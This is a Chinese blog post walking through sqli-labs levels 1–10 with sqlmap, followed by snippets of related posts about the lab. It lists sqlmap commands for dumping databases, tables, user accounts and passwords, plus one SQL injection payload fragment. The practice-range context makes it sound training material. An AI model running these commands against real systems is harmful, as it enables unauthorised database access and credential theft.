sqlmap過SQLi LABS靶場 1 10關

2021-10-06 19:34:24 字數 2824 閱讀 8753

今天我們來用sqlmap去做sqli-labs靶場

首先來講一下基礎命令

1.清除sqlmap快取:

第乙個辦法:在c:\users\dragoneyes.sqlmap\output,刪除output裡面的內容

第二個辦法:sqlmap.py --purge

2.sqlmap -u 注入點 檢測注入點是否可用

sqlmap -u 注入點 –batch 自動輸入

暴庫sqlmap -u 注入點 –dbs //暴庫

web當前使用的資料庫

sqlmap -u 注入點 –current-db //爆當前使用的庫

web資料庫使用的賬戶

sqlmap -u 注入點 –current-user //當前使用的賬戶

列出sqlserver所有使用者

sqlmap -u 注入點 –users // 列出所有使用過的賬戶

資料庫賬戶與密碼

sqlmap -u 注入點 –passwords //mysql的登入賬戶和密碼

列出資料庫中的表

sqlmap -u 注入點 -d 指定資料庫名 –tables //(-d指定資料庫名稱)

列出表中字段

sqlmap -u 注入點 -d 指定資料庫名 -t 指定的表名 –columns

爆欄位內容

sqlmap -u 注入點 -d 指定資料庫名 -t 指定表名 -c 「email,username,userpassword」 –dump (將結果匯出)

–risk:風險等級,共有4個,預設是1會測試大部分的測試語句,2會增加基於事件的測試語句,3會增加or語句的sql注入測試。

level:共有五個等級,預設為1,在你不確定哪個payload或者引數為注入點的時候,為了保證全面性,建議使用高的level值。

第一關

先準備sqlmap

找到注入的,進行最高等級的爆庫,很順利

找到資料庫型別和確定有注入點可利用

全部資料庫也爆出來了

檢視我們現在所在的資料庫 --current-db

然後我們檢視資料庫中的表–table

users表中應該有我們想要的,獲取字段–col

顯示我們想要的字段 --dump

拿下資料庫

第二關刪除上次的快取 --purge

和第一關一模一樣,

sqlmap.py -u ""

--leve=

5--risk=

3--dbs

第三關

一模一樣,沒難度

第四關一模一樣

工具用的

id=1") and 2038=2039 and (「vlst」="vlst

第5關一般的不行

跑到這裡點yes就行了

第六關和第5關一模一樣

第七關一模一樣

第八關一模一樣

第九關一樣

第十關一樣

總結一句sqlmapnb

Sqli labs 學習筆記

資料庫的連線函式 concat和concat ws concat ws的第乙個引數是連線字串的分隔符。user 返回當前資料庫連線使用的使用者 database 返回當前資料庫連線使用的資料庫 version 返回當前資料庫的版本 127.0.0.1 sqli labs less 1 id 1 un...

Sqli labs 部落格目錄

之前學習了一遍 sqli labs,這是鞏固複習一遍,全部手敲,加深印象 sqli labs 部落格目錄 sqli labs less01 04 基於錯誤的sql注入 get sqli labs less05 06 報錯型sql盲注 get sqli labs less07 輸出到檔案 get sq...

sqli labs環境搭建

安裝完成後介面如下。4 配置資料庫 開啟d phpstudy pro www sqli labs master sql connections db creds.inc 把密碼設定為root 5 修改phpstudy版本為5版本,否則執行sqli labs出現很多報錯。6 開啟sqli labs首頁...